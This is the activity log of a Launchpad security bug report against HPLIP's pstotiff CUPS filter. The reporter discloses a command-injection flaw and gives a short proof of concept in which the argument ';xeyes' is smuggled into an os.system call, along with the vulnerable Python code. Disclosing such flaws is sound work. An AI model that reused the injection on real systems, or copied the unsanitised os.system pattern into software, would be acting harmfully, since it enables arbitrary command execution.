HPLIP

  1. Bug #1599832
  2. Activity log

Activity log for bug #1599832

Date Who What changed Old value New value Message
2016-07-07 12:06:04 Bernd Dietzel bug added bug
2016-07-07 12:06:04 Bernd Dietzel attachment added Screenshot https://bugs.launchpad.net/bugs/1599832/+attachment/4696828/+files/Bildschirmfoto%20vom%202016-07-07%2013%3A53%3A21.png
2016-07-12 11:14:15 Bernd Dietzel description Prove of concept which will run the program xeyes but should not: python /usr/lib/cups/filter/pstotiff 1 2 3 4 5 ";xeyes" reason : sys.argv[6] is passed to a os.system call : ... temp_in_file = "-" if (len(sys.argv) > 6): temp_in_file = sys.argv[6] temp_out_handle, temp_out_fname = tempfile.mkstemp() font = "-I/usr/share/cups/fonts" device = "-dNOINTERPOLATE -sDEVICE=tiffg4 -dMaxStripSize=0 -r204x196 -dNOPAUSE -dBATCH -dSAFER -dPARANOIDSAFER -dSHORTERRORS -dWRITESYSTEMDICT -dGHOSTSCRIPT -sstdout=%stderr -sOutputFile=" + temp_out_fname + " " + temp_in_file gs_command = "/usr/bin/gs" + " " + font + " " + device exit_code = os.system(gs_command) ... Proof of concept which will run the program xeyes but should not: python /usr/lib/cups/filter/pstotiff 1 2 3 4 5 ";xeyes" reason : sys.argv[6] is passed to this os.system call : exit_code = os.system(gs_command)
2016-08-13 10:23:47 Bernd Dietzel information type Private Security Public Security